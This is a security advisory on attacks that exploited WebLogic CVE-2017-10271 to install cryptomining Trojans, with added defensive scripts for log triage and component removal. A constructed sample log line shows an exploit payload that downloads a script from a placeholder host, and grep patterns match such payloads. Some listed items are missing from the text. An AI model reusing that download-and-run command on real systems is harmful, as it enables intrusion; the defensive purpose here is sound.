On December 18, 2017, Alibaba Cloud Security detected a security event in which cloud servers running WebLogic were broken into and used for cryptocurrency mining. The record is as follows:
After emergency analysis, the Alibaba Cloud Security team confirmed that the attackers exploited the WebLogic deserialization vulnerability (CVE-2017-3248) and the WLS component vulnerability (CVE-2017-10271) to break into services that rely on the WLS component and implant a mining Trojan.
See the following for more information about the vulnerability.
WebLogic Server component remote command execution vulnerability
Attackers exploit the vulnerability by sending crafted HTTP requests to the WLS component and gain control of the target server; in this campaign they used that control to implant a mining Trojan, but the same foothold can be used to launch other targeted attacks.
The WLS component is not widely used, so the share of cloud hosts at risk of infection is low.
Condition and method of exploitation
The vulnerability can be exploited remotely and a public PoC is available.
Affected versions (the 12.x entries follow Oracle's October 2017 advisory linked below):
- Oracle WebLogic Server 10.3.6.0.0
- Oracle WebLogic Server 10.3.3.0.0
- Oracle WebLogic Server 12.1.3.0.0
- Oracle WebLogic Server 12.2.1.1.0
- Oracle WebLogic Server 12.2.1.2.0
To check whether your server is exposed or has already been intruded into:
Open http://ip_address:7001/wls-wsat, replacing "ip_address" and "7001" with your server's address and port. If the page responds, the vulnerable WLS-WebService component is deployed and reachable from wherever you ran the check; that alone is reason to restrict or remove it, even if none of the indicators below are present.
Check whether the following files are found in the WebLogic installation path (assuming that WebLogic is installed in the default directory):
Check whether the host log contains
If you find the files listed above in the WebLogic installation path and "/bin/bash" in the host log, the server may have been intruded into. "/bin/bash" can also appear in logs for legitimate reasons, so correlate it with POST requests to /wls-wsat/ in the HTTP access log; the public exploit posts its XMLDecoder payload to that path, and the request usually returns HTTP 500 even though the embedded command has already executed.
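The triage steps above, as an added example that is not part of the original advisory: two grep helpers for the access-log and host-log indicators, plus a live check of the /wls-wsat path. The log paths, the sample log lines and the error-message wording are constructed for illustration; the hostname and port for the live check are whatever you pass in.

```shell
#!/bin/sh
# Added example (not from the original advisory). Helpers for the
# CVE-2017-10271 indicators: POSTs to /wls-wsat/ in the HTTP access log and
# XMLDecoder/ProcessBuilder/"/bin/bash" markers in the host (server) log.

# count_wls_wsat_posts ACCESS_LOG
# Number of POST requests to the WLS-WebService endpoint. The public exploit
# posts to /wls-wsat/CoordinatorPortType; any Internet-sourced POST here is
# suspicious. Prints 0 (and still succeeds) when nothing matches.
count_wls_wsat_posts() {
    grep -c -E '"POST /wls-wsat/' "$1" || true
}

# find_payload_markers HOST_LOG
# Lines carrying the payload markers the advisory's "/bin/bash" indicator
# refers to. Prints nothing (and still succeeds) when there are none.
find_payload_markers() {
    grep -E 'XMLDecoder|ProcessBuilder|/bin/bash|/bin/sh' "$1" || true
}

# wls_wsat_http_code HOST PORT
# Live exposure check (needs network, so it is not run below): prints the HTTP
# status of GET /wls-wsat. A 200 means the component is deployed and reachable
# from this host; 000 means no answer within 5 seconds.
wls_wsat_http_code() {
    curl -s -o /dev/null --max-time 5 -w '%{http_code}' "http://$1:$2/wls-wsat"
}

# Demonstration on constructed logs (removed again at the end).
TMP=$(mktemp -d)

# Constructed access log in WebLogic's default common log format. The exploit
# POSTs get a 500 because XMLDecoder throws after ProcessBuilder has run.
cat > "$TMP/access.log" <<'EOF'
10.0.0.5 - - [18/Dec/2017:10:14:55 +0800] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 4102
198.51.100.23 - - [18/Dec/2017:10:15:02 +0800] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 1226
198.51.100.23 - - [18/Dec/2017:10:15:09 +0800] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 1226
EOF

# Constructed host log excerpt (wording is illustrative, not Oracle's).
cat > "$TMP/server.log" <<'EOF'
<Dec 18, 2017 10:15:02 AM CST> <Warning> <WebService> deployment of wls-wsat ok
<Dec 18, 2017 10:15:02 AM CST> <Error> java.beans.XMLDecoder: java.lang.ProcessBuilder [/bin/bash, -c, wget http://example.invalid/x.sh]
<Dec 18, 2017 10:16:00 AM CST> <Info> <Deployer> normal deployment message
EOF

echo "POSTs to /wls-wsat/: $(count_wls_wsat_posts "$TMP/access.log")"
echo "payload markers in host log:"
find_payload_markers "$TMP/server.log"

rm -rf "$TMP"
```

Run it on the real files with `count_wls_wsat_posts /path/to/access.log` and `find_payload_markers /path/to/AdminServer.log`; a non-zero POST count together with marker lines at the same timestamps is the pattern to escalate on.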
How to fix or mitigate
Delete the WAR package. Delete the wls-wsat WAR package and its deployed directory under the actual WebLogic installation path, as far as your services allow (removing it disables the WLS-WebService component for every application on that server), then restart WebLogic. The sample code is as follows:
Configure network access control. Apply an access control policy to
http://ip_address:7001/wls-wsat and prohibit direct access from the Internet. A security group or host firewall can only filter on port 7001; restricting the /wls-wsat path itself requires a reverse proxy or WAF in front of WebLogic.
Install the latest patch. Apply the fixes from Oracle's October 2017 Critical Patch Update: http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html.
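The WAR removal step above, as an added example that is not the advisory's own sample code. The paths are the ones default installs of 10.3.6 (wlserver_10.3) and 12.x (wlserver) use for the library WAR and for each managed server's exploded copies; they are assumptions, so confirm your MW_HOME and DOMAIN_HOME before running it, and stop the servers first.

```shell
#!/bin/sh
# Added example (not from the original advisory). Removes the WLS-WebService
# component (wls-wsat) from a WebLogic installation. Path layout is assumed
# from default 10.3.6 / 12.x installs; verify it on your own host.
# Removing the component disables WS-AtomicTransaction for every application
# on the server, so confirm nothing depends on it before running.

# remove_wls_wsat MW_HOME DOMAIN_HOME
# Deletes the library WAR and every deployed/exploded copy under the domain,
# printing each path removed. Returns 0 if at least one copy was found.
remove_wls_wsat() {
    mw_home=$1
    domain_home=$2
    found=0

    # Library WAR shipped with the server (10.3.x and 12.x locations).
    for war in "$mw_home/wlserver_10.3/server/lib/wls-wsat.war" \
               "$mw_home/wlserver/server/lib/wls-wsat.war"; do
        if [ -f "$war" ]; then
            rm -f "$war" && echo "removed $war" && found=1
        fi
    done

    # Exploded and staged copies under each server's tmp directory. An
    # unmatched glob stays literal and fails the -e test, so it is skipped.
    for copy in "$domain_home"/servers/*/tmp/_WL_internal/wls-wsat \
                "$domain_home"/servers/*/tmp/.internal/wls-wsat.war; do
        if [ -e "$copy" ]; then
            rm -rf "$copy" && echo "removed $copy" && found=1
        fi
    done

    [ "$found" -eq 1 ]
}

# Usage: stop the domain, remove the component, start it again, then confirm
# http://ip_address:7001/wls-wsat no longer answers.
#   "$DOMAIN_HOME"/bin/stopWebLogic.sh
#   remove_wls_wsat "$MW_HOME" "$DOMAIN_HOME"
#   "$DOMAIN_HOME"/bin/startWebLogic.sh
#
# Complementary port-level control while the patch is being scheduled: allow
# 7001 only from an administrative network (CIDR is a placeholder).
#   iptables -A INPUT -p tcp --dport 7001 -s 10.0.0.0/8 -j ACCEPT
#   iptables -A INPUT -p tcp --dport 7001 -j DROP

if [ "$#" -eq 2 ]; then
    remove_wls_wsat "$1" "$2" || echo "no wls-wsat copies found under $1 / $2"
else
    echo "usage: $0 MW_HOME DOMAIN_HOME"
fi
```

The function returns non-zero when nothing was found, which is the case to investigate: either the paths differ on this host or the component was never deployed, and the live check of /wls-wsat tells you which.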